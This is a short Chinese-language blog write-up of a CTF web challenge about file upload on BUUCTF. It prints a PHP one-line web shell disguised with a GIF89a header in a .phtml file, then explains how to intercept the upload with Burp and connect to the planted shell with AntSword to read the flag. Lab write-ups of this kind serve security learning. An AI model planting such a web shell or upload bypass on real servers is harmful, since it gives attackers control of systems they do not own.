CTF-Web-[極客大挑戰(zhàn) 2019]Upload
博客說(shuō)明
文章所涉及的資料來(lái)自互聯(lián)網(wǎng)整理和個(gè)人總結(jié),意在于個(gè)人學(xué)習(xí)和經(jīng)驗(yàn)匯總,如有什么地方侵權(quán),請(qǐng)聯(lián)系本人刪除,謝謝!本文僅用于學(xué)習(xí)與交流,不得用于非法用途!
CTP平臺(tái)
網(wǎng)址
題目
Web類(lèi),[極客大挑戰(zhàn) 2019]Upload

image-20200503185408158
打開(kāi)題目的實(shí)例

image-20200503185541064
思路
做一個(gè)phtml的文件

image-20200503191203100
將里面的內(nèi)容改為一句話(huà)木馬,為我們后面的蟻劍連接做準(zhǔn)備
GIF89a
<script language="php">eval($_POST['shell']);</script>
我們將它上傳,使用bp截取,修改一下格式,再放行

image-20200503192426171

image-20200503192443531
蟻劍連接
我們使用蟻劍連接,猜測(cè)路徑為upload
/upload/test.phtml
完整路徑
http://3cc0c310-5536-49f0-8e10-1aca744981b8.node3.buuoj.cn/upload/test.phtml
密碼就是我們?cè)谝痪湓?huà)密碼里面寫(xiě)的
shell

image-20200503192737386
然后我們就進(jìn)來(lái)了

image-20200503192931850
像這樣的話(huà)直接找根目錄,發(fā)現(xiàn)flag

image-20200503193109111
感謝
BUUCTF
以及勤勞的自己